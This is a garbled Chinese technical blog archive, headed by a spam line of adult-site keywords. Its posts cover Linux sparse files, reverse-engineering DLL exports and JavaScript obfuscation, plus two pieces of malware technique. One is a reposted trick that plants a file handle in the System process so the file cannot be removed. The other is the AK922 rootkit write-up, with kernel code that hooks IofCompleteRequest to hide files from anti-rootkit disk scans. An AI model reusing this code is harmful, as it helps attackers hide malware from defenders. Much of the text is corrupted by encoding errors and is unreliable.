国产精品一二三四,国产美女精品一区二区三区,亚洲高清在线播放

Linux对稀疏（Sparse�Q�文件的支持

叶子 — Thu, 26 Jun 2008 05:47:00 GMT

�E�疏（Sparse�Q�文件的创徏

在EXT2/EXT3文�g�pȝ��上可以��用dd创徏�E�疏文�Ӟ��

$ dd if=/dev/zero of=fs.img bs=1M seek=1024 count=0
0+0 records in
0+0 records out
$ ls -lh fs.img
-rw-rw-r-- 1 zhigang zhigang 1.0G Feb 5 19:50 fs.img
$ du -sh fs.img
0 fs.img
使用C语言来创��Z��个稀疏文件的�Ҏ��如下�Q?br>

$ cat sparse.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int fd = open("sparse.file", O_RDWR|O_CREAT);
    lseek(fd, 1024, SEEK_CUR);
    write(fd, "\0", 1);

    return 0;
}

$ gcc -o sparse sparse.c
$ ./sparse
$ ls -l sparse.file
-r-x--x---  1 zhigang zhigang 1025 Feb  5 23:12 sparse.file
]$ du sparse.file
4       sparse.file
使用python来创��Z��个稀疏文件的�Ҏ��如下�Q?

$ cat sparse.py
#!/usr/bin/env python

f = open('fs.img', 'w')
f.seek(1023)
f.write('\n')

$ python sparse.py
$ ls -l fs.img
-rw-rw-r--  1 zhigang zhigang 1024 Feb  5 20:15 fs.img
$ du fs.img
4       fs.img

文�g�E�疏化�Q�sparsify�Q?/strong>

下面的方法都可以��一个文件稀疏化�?br>
1. cp:

$ cp --sparse=always file file.sparse

cp�~�省使用--sparse=auto�Q�会自动探测源文件中是否有空�z�，以决定目标文件是否�ؓ�E�疏文�Ӟ��使用--sparse=never会禁止创建稀疏文件�?br>
2. cpio:

$ find file |cpio -pdmuv --sparse /tmp

如果不加--sparse参数�Q�稀疏文件中的空�z�将被填满�?

3. tar:

$ tar cSf - file | (cd /tmp/tt; tar xpSf -)

如果不加 -S --sparse参数�Q�稀疏文件中的空�z�将被填满�?

文�g�E�疏化�Q�sparsify�Q�效率比�?/strong>

下面我们创徏一�?00M的稀疏文�Ӟ��比较一下几�U�文件稀疏化�Ҏ��的效率�?

$ dd if=/dev/zero of=file count=100 bs=1M seek=400
100+0 records in
100+0 records out
$ time cp --sparse=always file file.sparse
real    0m0.626s
user    0m0.205s
sys     0m0.390s

$ time tar cSf - file | (cd /tmp; tar xpSf -)
real    0m2.732s
user    0m1.706s
sys     0m0.915s

$ time find file |cpio -pdmuv --sparse /tmp
/tmp/file
1024000 blocks
real    0m2.763s
user    0m1.793s
sys     0m0.946s

由此可见�Q�上面几�U�文件稀疏化的方法中�Q�cp的效率最高；tar和cpio�׃��使用��道�Q�效率下降�?

使EXT2/EXT3文�g�pȝ��E�疏化�Q�sparsify�Q?/strong>

如何是一个文件系�l�的映像文�g�E�疏化�Q�Ron Yorston为大家提供了几种�Ҏ��Q�我觉得下面的方法最��单：

1. 使用Ron Yorston�?a >zerofree��文件系�l�中未��用的块清零�?br>

$ gcc -o zerofree zerofree.c -lext2fs
$ ./zerofree fs.img

2.使用cp命��o使映像文件稀疏化�Q?

$ cp --sparse=always fs.img fs_sparse.img

EXT2/EXT3文�g�pȝ��的sparse_super参数

�q�个参数与EXT2/EXT3是否支持Sparse文�g无关�Q�当打开该参数时�Q�文件系�l�将使用更少的超�U�块�Q�Super block�Q�备份，以节省空间�?/p>
如下的命令可以查看该参数�Q?br>

# echo stats | debugfs /dev/hda2 | grep -i features
Filesystem features:      has_journal ext_attr resize_inode dir_index filetype needs_recovery sparse_super large_file

或者：

# tune2fs -l /dev/hda2 |grep "Filesystem features"
Filesystem features:      has_journal ext_attr resize_inode dir_index filetype needs_recovery sparse_super large_file

可以通过使用�Q?

# tune2fs -O sparse_super

或者：

# tune2fs -s [0|1]

来设�|�该参数�?

参考资�?br>

Keeping filesystem images sparse:

         http://intgat.tigress.co.uk/rmy/uml/sparsify.html.

叶子 2008-06-26 13:47 发表评论

CFileDialog 异常退出的问题

叶子 — Wed, 18 Jun 2008 03:52:00 GMT
很多人遇到这个问题，�l�于扑ֈ�了原因�?br>两行��单的代码�Q?br>

CFileDialog dlg(true);
    dlg.DoModal();

�W�一�ơ随侉K��择一个文�Ӟ��W�二�ơ选择桌面的一�?txt文�g�Q�当鼠标�U�d��到这个txt文�g的时候，�E�序��挂了。怀疑是微��Y的问题？

换api操作�Q�照��h��?br>
换记事本�Q�挂�?br>
Windbg跟踪�Q�找不到哪个模块�Q�程序最后崩溃在shell32.dll�Q�检查进�E�的dll模块�Q�最后终于找到是Adobe的pdfshell.dll引�v的。删除掉或者regsvr32 /u 卸蝲��可以了。水�q�x��限，不能跟进那个dll��L��查了�?br>

pdf版本7.0.8.0
�pȝ��xp sp2

叶子 2008-06-18 11:52 发表评论

[转]一�D늲�巧的代码~~ring3文�g占坑大法

叶子 — Mon, 04 Feb 2008 03:57:00 GMT
#include

BOOL OccupyFile( LPCTSTR lpFileName );

int main()
{
    OccupyFile("c:\\aaa111.txt");

    return 0;
}

void RaiseToDebugP()
{
    HANDLE hToken;
    HANDLE hProcess = GetCurrentProcess();
    if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
    {
        TOKEN_PRIVILEGES tkp;
        if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
        {
            tkp.PrivilegeCount = 1;
            tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

            BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0) ;
        }
        CloseHandle(hToken);
    }
}

BOOL OccupyFile( LPCTSTR lpFileName )
{
    BOOL    bRet;

    RaiseToDebugP();

    HANDLE hProcess = OpenProcess( PROCESS_DUP_HANDLE, FALSE, 4);    // 4为system�q�程�?br>
    if ( hProcess == NULL )
    {
        hProcess = OpenProcess( PROCESS_DUP_HANDLE, FALSE, 8);        // 2K下是 8??

        if ( hProcess == NULL )
            return FALSE;
    }

    HANDLE hFile;
    HANDLE hTargetHandle;

    hFile = CreateFile( lpFileName, GENERIC_READ, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, NULL);

    if ( hFile == INVALID_HANDLE_VALUE )
    {
        CloseHandle( hProcess );
        return FALSE;
    }

    bRet = DuplicateHandle( GetCurrentProcess(), hFile, hProcess, &hTargetHandle,
        0, FALSE, DUPLICATE_SAME_ACCESS|DUPLICATE_CLOSE_SOURCE);

    CloseHandle( hProcess );

    return bRet;
}

叶子 2008-02-04 11:57 发表评论

清空代码防止查看源代�?ZT)

叶子 — Wed, 12 Dec 2007 06:55:00 GMT

HTML代码

<html> <head> <script language="javascript"> function clear(){ Source=document.body.firstChild.data; document.open(); document.close(); document.title="看不到源代码"; document.body.innerHTML=Source; } </script> </head> <body onload=clear()>  </body> </html>
[Ctrl+A 全部选择提示�Q�你可先修改部分代码�Q�再按运行]

�q�招��是目前�|�上公布的防止查看源代码的方法中最好的了，当然了，要看�q�是办法的，比如在地址栏中输入

javascript:alert(document.documentElement.outerHTML);

叶子 2007-12-12 14:55 发表评论

叶子 — Wed, 12 Dec 2007 06:29:00 GMT

本文一�׃��l�了七种javascript加密�Ҏ��Q?br>
　　在做�|�页�Ӟ��其实是网��|��马呵呵）�Q�最让�h烦恼的是自己辛辛苦苦写出来的客户端IE�q�行的javascript代码常常被别��易的拯��Q�实在让自己的心里有点不是滋呻I��要知道自己写点东西也挺篏�?.....^*^

　　但我们也应该清楚地认识到因�ؓjavascript代码是在IE中解释执行，要想�l�对的保密是不可能的�Q�我们要做的��是��可能的增大拯��者复制的隑ֺ��Q�让他知难而退�Q�但愿~!~�Q�，下面我结合自��p��几年来的实践�Q�及个�h研究的心得，和大家一��h��探讨一下网��中javascript代码的加密解密技术�?br>
　　以加密下面的javascript代码��Z��Q?br>

　　一�Q�最��单的加密解密

　　大家对于javascript函数escape()和unescape()惛_��是比较了解啦�Q�很多网��加密在用它们）�Q�分别是�~�码和解码字�W�串�Q�比如例子代码用escape()函数加密后变为如下格式：

alert%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B

　　如何�Q�还看的懂吗�Q�当然其中的ASCII字符"alert"�q�没有被加密�Q�如果愿意我们可以写点javascript代码重新把它加密如下�Q?br>
%61%6C%65%72%74%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B

　　呵呵�Q�如何？�q�次是完全都加密了！

　　当然�Q�这样加密后的代码是不能直接�q�行的，�q�好�q�有eval(codeString)可用�Q�这个函数的作用��是��查javascript代码�q�执行，必选项 codeString 参数是包含有�?javascript 代码的字�W�串��|��加上上面的解码unescape()�Q�加密后的结果如下：

　　是不是很��单？不要高兴�Q�解密也��同��L��单，解密代码都摆�l�别人啦�Q�unescape()�Q�！呵呵

　　二：转义字符""的妙�?/strong>

　　大家可能对�{义字�W?"不太熟悉�Q�但对于javascript提供了一些特�D�字�W�如�Q�n �Q�换行）�?r �Q�回车）�? �Q�单引号�Q�等应该是有所了解的吧�Q�其�?"后面�q�可以跟八进制或十六�q�制的数字，如字�W?a"则可以表�C�Zؓ�Q?141"�?x61"�Q�注意是��写字符"x"�Q�，至于双字节字�W�如汉字"�?则仅能用十六�q�制表示�?u9ED1"�Q�注意是��写字符"u"�Q�，其中字符"u"表示是双字节字符�Q�根据这个原理例子代码则可以表示为：

　　八进制�{义字�W�串如下:

　　十六�q�制转义字符串如�?

　　�q�次没有了解码函敎ͼ�因�ؓjavascript执行时会自行转换�Q�同栯��码也是很��单如下：

　　��׃��弹出对话框告诉你解密后的�l�果�Q?br>
　　三：使用Microsoft出品的脚本编码器Script Encoder来进行编�?/strong>

　　工具的��用就不多介绍啦！我是直接使用javascript调用控�gScripting.Encoder完成的编码！代码如下�Q?/p>
';
var Encode=Senc.EncodeScriptFile(".htm",code,0,"");
alert(Encode);

　　�~�码后的�l�果如下�Q?/p>

　　够难看懂得吧�Q�但相应的解密工��h��已出来，而且�q�解密网��都有！因�ؓ其解密网��代码过多，我就不多说拉�Q�给大家介绍一下我独创的解密代码，如下�Q?/p>

　　咋样�Q�够��单吧�Q�它是原理是�Q�编码后的代码运行前IE会先对其�q�行解码�Q�如果我们先把加密的代码攑օ�一个自定义函数如上面的decode()中，然后对自定义函数decode调用toString()�Ҏ��Q�得到的��是解码后的代码�Q?/p>
　　如果你觉得这��L��码得到的代码LANGUAGE属性是JScript.Encode�Q�很�Ҏ��让�h识破�Q�那么还有一个几乎不��Z�h知的window对象的方法execScript()�Q�其原�Ş为：

　　window.execScript( sExpression, sLanguage )

　　参数�Q?br>
sExpression:　必选项。字�W�串(String)。要被执行的代码�?br>
sLanguage　:　必选项。字�W�串(String)。指定执行的代码的语�a�。默认��gؓ Microsoft JScript

使用�Ӟ��前面�?window"可以省略不写�Q?/p>
　　利用它我们可以很好的�q�行�~�码后的javascript代码�Q�如下：

　　你可以利用方法二对其中的""号内的字�W�串再进行编码，使得"JScript.Encode"以及�~�码特征�?#@~^"不出玎ͼ�效果会更好！

　　四：��L��d��NUL�I�字�W�（十六�q�制00H�Q?/strong>

　　一�ơ偶然的实验�Q��我发现在HTML�|�页中�Q意位�|�添加�Q意个数的"�I�字�W?�Q�IE照样会正常显�C�其中的内容�Q��ƈ正常执行其中的javascript 代码�Q�而添加的"�I�字�W?我们在用一般的�~�辑器查看时�Q�会昄��形如�I�格或黑块，使得原码很难看懂�Q�如用记事本查看�?�I�字�W?会变�?�I�格"�Q�利用这个原理加密结果如下：�Q�其中显�C�的"�I�格"代表"�I�字�W?�Q?/p>

a l er t (" �?nbsp;�?nbsp;一 �?) ;
< / SC R I P T>

　　如何�Q�是不是昑־��׃��八糟的？如果不知道方法的人很难想到要��L��里面�?�I�字�W?�Q?0H�Q�的�Q?br>
　　五：无用内容混�ؕ以及换行�I�格TAB大法

　　在javascript代码中我们可以加入大量的无用字符串或数字�Q�以及无用代码和注释内容�{�等�Q��真正的有用代码埋没在其中�Q��ƈ把有用的代码中能加入换行、空根{��TAB的地方加入大量换行、空根{��TAB�Q��ƈ可以把正常的字符串用""来进行换行，�q�样��׃��使得代码难以看懂�Q�如我加密后的�Ş式如下：

　　臛_��如果我看到这��L��代码是不会有心思去分析它的�Q�你哪？

　　六：自写解密函数�?/strong>

　　�q�个�Ҏ��和一、二差不多，只不�q�是自己写个函数对代码进行解密，很多VBS病毒使用�q�种�Ҏ��对自�w�进行加密，来防止特征码扫描�Q�下面是我写的一个简单的加密解密函数�Q�加密代码如下（详细参照文�g"加密.htm"�Q�：

　　�q�行得到加密�l�果为：

o%CD%D1%D7%E6%9CJ%u9EF3%uFA73%uF1D4%u14F1%u7EE1Kd

　　相应的加密后解密的代码如下：

　　七：错误的利�?/strong>

　　利用try{}catch(e){}�l�构对代码进行测试解密，虽然�q�个��x��很好�Q�呵呵，夸夸自己�Q�，因�ؓ实用性不大，我仅�l�个例子

~~叶子 2007-12-12 14:29 发表评论~~

调用未知DLL中的导出函数

叶子 — Tue, 30 Oct 2007 07:20:00 GMT

不知道诸位看官是否有�q�这��L��l�历�Q�在不经意之间发��C��个DLL文�g�Q�它里边有不��有��的导出函数——但是由于你不知道如何调用这些函敎ͼ�所以只能大发感慨而又无能为力焉。固然有些知名的DLL可以直接通过搜烦引擎来找到它的��用方式（比如本文中的例子ipsearcher.dll�Q�，不过我们诚然不能希望自己总能交到�q�样的好�q�。所以在本文中，李马希望通过自己文理不甚通达的讲解能够给大家以授��Z��渔的效果�?/p>
先决条�g

阅读本文�Q�你需要具备以下先��x��Ӟ��

初步了解汇编语言�Q�虽然你�q�不一定需要去��L��DLL中导出函数的汇编代码�Q�但是你臛_��应该了解诸如push、mov�q�些常用的汇�~�指令�?
一个能够查看DLL中导出函数的工具�Q�Visual Studio中自带的Dependency Walker��p��够胜��M��Q�当然你也可以选择eXeScope�?
一个调试器。理��Z��讲VC也可以完成调试的工作�Q�但它毕竟是更加针对于源代码一�U�调试的工具�Q�所以你最好选择一个专用的汇编调试器。在本文中我用的是OllyDbg——我不会介绍有关�q�个调试工具的�Q何东西，而只是简要介�l�我的调试过�E��?

准备好了吗？那么我们做一个热�w�运动吧先�?/p>
热��n——函数调用约�?/strong>

�q�里要详�l�介�l�的是有兛_��数调用约定的内容�Q�如果你已经了解了这斚w��的内容，可以跌��本节�?/p>
你可能在学习Windows�E�序设计的时候早已接触过“函数调用�U�定”�q�个词汇了，那个时候你所了解的内容可能是一个笼�l�的概念�Q�内容大抉|��说函数调用约定就是指的函数参数进栈顺序以及堆栈修正方式。譬如cdecl调用�U�定是函数参数自双��左�q�栈�Q�由调用者修复堆栈；stdcall调用�U�定亦是函数参数自右而左�q�栈�Q�但是由被调用者修复堆�?#8230;…噢不�Q�这太晦涩了——在源代码上我们是无法看到这些东西的�Q?/p>
那么我们别无选择�Q�只有深入到汇编一层了。考虑以下C++代码�Q?/p>

#include int __cdecl max1( int a, int b ) {     return a > b ? a : b; } int __stdcall max2( int a, int b ) {     return a > b ? a : b; } int main() {     printf( "max( 1, 2 ) of cdecl version: %d\n", max1( 1, 2 ) );     printf( "max( 1, 2 ) of stdcall version: %d\n", max2( 1, 2 ) );     return 0; }

对应的汇�~�代码�ؓ�Q?/p>

; int __cdecl max1( int a, int b ) 00401000 MOV EAX,DWORD PTR SS:[ESP+4] 00401004 MOV ECX,DWORD PTR SS:[ESP+8] 00401008 CMP EAX,ECX 0040100A JG SHORT CppTest.0040100E 0040100C MOV EAX,ECX 0040100E RETN ; int __stdcall max2( int a, int b ) 00401010 MOV EAX,DWORD PTR SS:[ESP+4] 00401014 MOV ECX,DWORD PTR SS:[ESP+8] 00401018 CMP EAX,ECX 0040101A JG SHORT CppTest.0040101E 0040101C MOV EAX,ECX 0040101E RETN 8 ; 被调用者的堆栈修正 ; max1( 1, 2 ) 00401030 PUSH 2 00401032 PUSH 1 00401034 CALL CppTest.00401000 00401039 ADD ESP,8 ; 调用者的堆栈修正 ; max2( 1, 2 ) 0040104A PUSH 2 0040104C PUSH 1 0040104E CALL CppTest.00401010

好了�Q�我来简要介�l�一下。函数参��C��入函��C��是借由堆栈�D�完成的�Q�也��是��各个参��C��某种�ơ序推入SS中——在cdecl与stdcall�U�定中，�q�个�ơ序都是自右而左的。另外，�׃��参数推入了堆栈致��堆栈指针ESP发生了变化，所以要在函数结束的时候重��C��正ESP。从上边的汇�~�代码中你也可以很清楚地看到�Q�cdecl�U�定是在调用max1之后修正的ESP�Q�而stdcall�U�定则是在max2�q�回时借由RETN 8完成了这个修正工作�?/p>
另外�Q�从上边的汇�~�代码中�q�可以看刎ͼ�函数的返回值是由EAX带回的�?/p>
庖丁解牛

在了解了以上的知识后�Q�我们就可以使用调试器来调试那个未知的DLL了。可以说�Q�这整个的调试过�E�充满了惊险和刺�Ȁ�Q�而且我们�q�需要一定的技巧——如果你像我一样不喜欢阅读汇编代码的话�?/p>
在本文中�Q�我所选择的调试示例是FTerm中附带的ipsearcher.dll�Q�它提供了对�U�真IP数据库的查询接口。下图是用Dependency Walker对其分析的结果：

你可以看刎ͼ��q�里�Ҏ��两个导出函数�Q�LookupAddress和_GetAddress�Q�那么我们可以按照返回倹{��调用约定、函数名、参数列表的��序��它们声明如下：

? ? LookupAddress( ? ); ? ? _GetAddress( ? );

是的�Q�有太多的未知，下面李马��要逐一地破解这些问受��?/p>
调试器不可能孤立地对DLL�q�行调试�Q�我们所需要的应该是一个合适的EXE�Q�这��h��助于我们的探�I�工作。在�q�里我选择的EXE是我�~�写的ipsearcher.exe�Q�当然这可能会让你认为我�q�篇文章的组�l�顺序有问题——毕竟是我已�l�知道了�q�两个导出函��C��后（�~�写了ipsearcher.exe�Q�还要假装成不知道的样子来对ipsearcher.dll来进行探�IӞ��所以我军_��在下文中不对ipsearcher.exe的代码进行�Q何关注，而是直接�q�入到ipsearcher.dll的领�I��?/p>

打开调试器，载入ipsearcher.exe。当ipsearcher.dll被装载后�Q�会引发一个访问异常，可以忽略�q�个异常�l�箋调试。根据Dependency Walker的分析结果，在ipsearcher.dll�?x00001BB0�?x00001C40处各下一个断炏V��现在在“IP地址”中输入一个IP地址�Q�这里以寒泉BBS的IP��Z��Q�，点击“查询”�Q�会发现指��o跛_��0x00001C40中（也就是_GetAddress�Q�，它的代码如下�Q?/p>

10001C40 MOV EAX,DWORD PTR SS:[ESP+4] ; 一个参�?/font> 10001C44 PUSH ipsear_1.10009BE8 10001C49 PUSH EAX 10001C4A CALL ipsear_1.LookupAddress ; 两个参数 10001C4F ADD ESP,8 ; LookupAddress是cdecl调用�U�定 10001C52 MOV EAX,ipsear_1.10009BE8 10001C57 RETN ; _GetAddress�q�厮也是cdecl调用�U�定

很短的几行代码，不过它已�l�可以提供这些信息了�Q?/p>

从SS的��用来看，_GetAddress只带有一个参数�?
_GetAddress中调用了LookupAddress�Q�后者带有两个参数�?
调用LookupAddress之后�q�行了堆栈修正，所以LookupAddress是cdecl调用�U�定�?
_GetAddress�q�回时�ƈ未进行堆栈修正，所以_GetAddress也是cdecl调用�U�定�?

于是�Q�我们可以替换一下刚才的问号了：

? CDECL LookupAddress( ?, ? ); ? CDECL _GetAddress( ? );

下面可以�q�行单步调试了，当代码步�?0001C44�Ӟ��你会发现寄存器窗口发生了如下的变化：

“202.207.177.9”�l�于出现了，�q�样一来我们可以��l�对问号�q�行替换了：

? CDECL LookupAddress( PCSTR, ? ); ? CDECL _GetAddress( PCSTR );

现在�l�箋对代码进行跟�t�，是进入LookupAddress的时候了。我们可以从先前_GetAddress的代码中可以发现�Q�这两个导出函数一直在围绕10009BE8�q�个地址做文章，那么我们��p��在单步调试LookupAddress的同时关注这个地址的数据改变。几步跟�t�之后，你会发现10009BE8开头的8字节�Q�两个DWORD�Q�数据发生了改变�Q�变成了10009AB4�?0009B1C。那么我们再转向�q�两个地址�Q�会发现�Q?/p>

�q�样一来就很清楚了�Q?0009BE8是一个字�W�串指针的数�l�，它有两个元素。也��是��_��我们的函数声明可以换成这��P��

? CDECL LookupAddress( PCSTR, PSTR* ); PSTR* CDECL _GetAddress( PCSTR );

接下来需要确定的��是LookupAddress的返回��g��。纵观LookupAddress的返回代码，你会发现�q�样的片断：

; 片断1 10001C0B XOR EAX,EAX 10001C0D POP ESI 10001C0E RETN ; 片断2 10001C2B MOV EAX,1 10001C30 POP ESI 10001C31 RETN

也就是说�Q�这个函数有两个�q�回��|��0�?。那么最后的真相�l�于大白于天下—�?/p>

BOOL CDECL LookupAddress( PCSTR, PSTR* ); PSTR* CDECL _GetAddress( PCSTR );

GetProcAddress�Q?/strong>

到此为止�Q�这两个函数的声明终于让我们扑և�来了。也�怽�会觉得这��够了——接下来��是用typedef定义函数指针�Q�然后��用LoadLibrary、GetProcAddress调用�q�些函数的事情了�?/p>
如果你真的这么认为的话，那我认�ؓ我有必要向你介绍�q�另外的一�U�方式�?/p>
首先请你建立一个名为ipsearcher.def的文�Ӟ��然后在其中写入如下内容：

LIBRARY "ipsearcher" EXPORTS LookupAddress @1 _GetAddress   @2

��文件保存后�Q�进入到命��o行模式下�Q�输入以下命令（前提是你拥有Visual Studio的附带工具lib.exe�q�有正确的�\径指向。以Visual Studio 6.0��Z��Q�这个工具通常位于Microsoft Visual Studio\VC98\Bin下）�Q?/p>
lib /def:ipsearcher.def

执行的结果有一个警告，不必理会。这时候我们会发现�Q�lib为我们生成了一个ipsearcher.lib�?/p>
然后�Q�我们��l�编写ipsearcher.h文�g�Q�如下：

#ifndef IPSEARCHER_H #define IPSEARCHER_H #include #pragma comment( lib, "ipsearcher.lib" ) extern "C" { BOOL CDECL LookupAddress( PCSTR, PSTR* ); PSTR* CDECL _GetAddress( PCSTR ); }; #endif // IPSEARCHER_H

大功告成�Q�这��h��们就��个光�U�秃的ipsearcher.dll做了一份SDK开发包�Q�而不必再使用动态加载的�Ҏ��了�?/p>
�ȝ��一下再

其实�Q�探�I�一个DLL�q��像我�q�里所讲述的这么简单。这��工作很可能需要阅��d��量的汇编代码�Q�了解DLL函数体的��程才能使真相大白于天下。另外，�q�不能排除有的DLL被加密、加壟뀁反跟踪……也就是说对于ipsearcher.dll�Q�那��直就是我捡了个便宜来借花献佛了�?/p>

叶子 2007-10-30 15:20 发表评论

叶子 — Fri, 12 Oct 2007 03:58:00 GMT
AK922: �H�破��盘低�񔋂��实现文仉��?br>作者：Azy
email: Azy000@gmail.com
完成于：2007-08-08

   目前�Q�一些已公开的主��anti-rootkit��隐藏文件主要有两种�Ҏ��Q�第一�U�是文�g�pȝ��层的��，属于�q�一�cȝ��有icesword�Q�darkspy�Q�gmer�{�。第二种便是��盘�U�别的低�U�检��（Disk Low-Level Scanning�Q�，属于�q�一�cȝ��ark也很多，典型代表为rootkit unhooker�Q�filereg�Q�is的插�Ӟ��Q�rootkit revealer�Q�blacklight�{�。当�Ӟ��q�有一些工��P��它们在应用层上通过调用ZwQueryDirectoryFile来实施检��?br>   驱动也好�Q�应用也�|�，说白了就是直接或间接发送IRP��C��层驱动。第一�cȝ��发送到FSD中（fastfat.sys/ntfs.sys�Q�，�W�二�c�被发送到��盘驱动�Q�disk.sys�Q�，而后IRP便会携带相应的文件信息返回，�q�时上层应用再根据返回信息进行处理和判断。但是由于Disk�U�比FS�U�更底层�Q�IRP�q�回�l�我们的是更加接�q�数据原始组�l�方式的��盘扇区信息�Q�所以在Disk层上实施文�g��可以得到更令�h信服的结果。但�q��ƈ不等于说�q�类��不能被击��|。本文就��介�l�一�U�绕�q�该�c�L��的实现�Ҏ��Q�当�Ӟ��q�也是在AK922中��用的�?br>   对于要实现文仉��藏的RK�Q�与其说�?#8220;�l�过”�Q�还不如说是“拦截” -- 挂钩某些内核函数调用�Q�以便在�q�回上层之前我们有机会过滤掉待隐藏文件的信息�?br>   AK922采用的方法是Hook内核函数IofCompleteRequest。这个函数很有意思，因�ؓ它不仅是一个几乎在��M��驱动中都要调用的函数�Q�而且参数中正好含有IRP。有了IRP�Q�就有了一切。这些特性决定了它很适合做我们的“傀�?#8221;。但更重要的是，一般在驱动中调用IofCompleteRequest之时IRP操作都已完毕�Q�IRP中相兛_��已经填充了内容，�q�就便于我们着手直接进行过滤而不用再做诸如发送IRP安装完成例程之类的操作�?br>   下面��q��重说一下工作流�E�：
   首先�Q�判断MajorFunction是不是IRP_MJ_READ以及IO堆栈中的DeviceObject是否是磁盘驱动的讑֤�对象�Q�因��才是我们要处理的核心IRP�Q�所有ark直接发送到Disk层的IRP在这里都可以被拦截到�?br>   接下来的处理要特别注意，�q�入到这里时IRQL是在APC_LEVEL以上的，因此我们不能��C�Q何IRP中的用户模式�~�冲区，一��极有可能蓝�Q�也��是说我们不能直接处理相关磁盘扇��Z��息，而必��通过ExQueueWorkItem排队一个WorkItem的方法来处理。除此之外，�׃��Disk层在讑֤�堆栈中处于靠下的位置�Q�大部分IRP发到�q�里时当前进�E�上下文早已不是原始IRP发�v者的�q�程上下文了�Q�这里的发�v者应理解为ark�q�程。幸�q�的是在IRP的Tail.Overlay.Thread域中�q�保存着原始ETHREAD指针�Q��ؓ了操作用��h��式缓冲区�Q�必��调用KeAttachProcess切到IRP发�v者的上下文环境中�Q�而这个工作只能在处于PASSIVE_LEVEL�U�上的工作者线�E�中执行。在DISPATCH_LEVEL�U�上�Q�做的事��少��好�?br>   刚开始我�q�分两种情况�q�行处理�Q�因为�ƈ不是所有的IRP都不处在原始上下文中�Q�比如icesword发的IRP到这里还是处在icesword.exe�q�程中的�Q�这时我认�ؓ可以不用排队工作��，�q�样��可以节省很多系�l�资源，提高�q��o效率。于是我试图在DISPATCH_LEVEL�U�上直接操作用户�~�冲区，但这�Ҏ��行不通。驱动很不稳定，不一会就蓝了。故索性老老实实地排队��M��Q�然后再分情况处理。代码如下：

// 处理Disk Low-Level Scanning
if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)
{

    orgnThread = Irp->Tail.Overlay.Thread;
    orgnProcess = IoThreadToProcess(orgnThread);

    if(Irp->MdlAddress)
    {
        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);

        // UserBuffer必须有效
        if(UserBuffer)
        {

            if(KeGetCurrentIrql() == DISPATCH_LEVEL)
            {

                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));

                WorkerCtx->UserBuffer = UserBuffer;
                WorkerCtx->Length = irpSp->Parameters.Read.Length;
                WorkerCtx->EProc = orgnProcess;

                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);

                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);
            }
        }

    }
}


   来到工作者线�E�，��C��PASSIVE_LEVEL�U�上�Q�切换上下文之后�Q�似乎安全多了。但是以防万一�Q�操作用��h��式缓冲区之前�q�是要调用ProbeForXxx函数先判断一下。相关代码如下：

VOID WorkerThread(PVOID Context)
{
    KIRQL irql;
    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;
    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;
    //PMDL mdl;


    if(((PWORKERCTX)Context)->UserBuffer)
    {
        if(eproc != currProc)
        {

            KeAttachProcess(eproc);

            __try{

                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }

            __except(EXCEPTION_EXECUTE_HANDLER){

                //DbgPrint("we can't op the buffer now :-(");
                KeDetachProcess();
                return;
            }

            KeDetachProcess();

        }else{

            __try{

                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }

            __except(EXCEPTION_EXECUTE_HANDLER){}
        }

    }
}

   准备工作�l�于��是做得差不多了�Q�下面就开始真正涂改磁盘扇区内容了。这里将涉及到FAT32和NTFS��盘文�g�l�构�Q�我先把要用到的主要�l�构列出来，其余的大家可以参考《NTFS Documentation》�?br>
typedef struct _INDEX_HEADER{
    UCHAR            magic[4];
    USHORT            UpdateSequenceOffset;
    USHORT            SizeInWords;
    LARGE_INTEGER    LogFileSeqNumber;
    LARGE_INTEGER    VCN;
    ULONG            IndexEntryOffset;    // needed!
    ULONG            IndexEntrySize;
    ULONG            AllocateSize;
}INDEX_HEADER, *PINDEX_HEADER;

typedef struct _INDEX_ENTRY{
    LARGE_INTEGER        MFTReference;
    USHORT            Size;                // needed!
    USHORT            FileNameOffset;
    USHORT            Flags;
    USHORT            Padding;
    LARGE_INTEGER        MFTReferParent;
    LARGE_INTEGER        CreationTime;
    LARGE_INTEGER        ModifyTime;
    LARGE_INTEGER        FileRecModifyTime;
    LARGE_INTEGER        AccessTime;
    LARGE_INTEGER        AllocateSize;
    LARGE_INTEGER        RealSize;
    LARGE_INTEGER        FileFlags;
    UCHAR            FileNameLength;
    UCHAR            NameSpace;
    WCHAR            FileName[1];
}INDEX_ENTRY, *PINDEX_ENTRY;

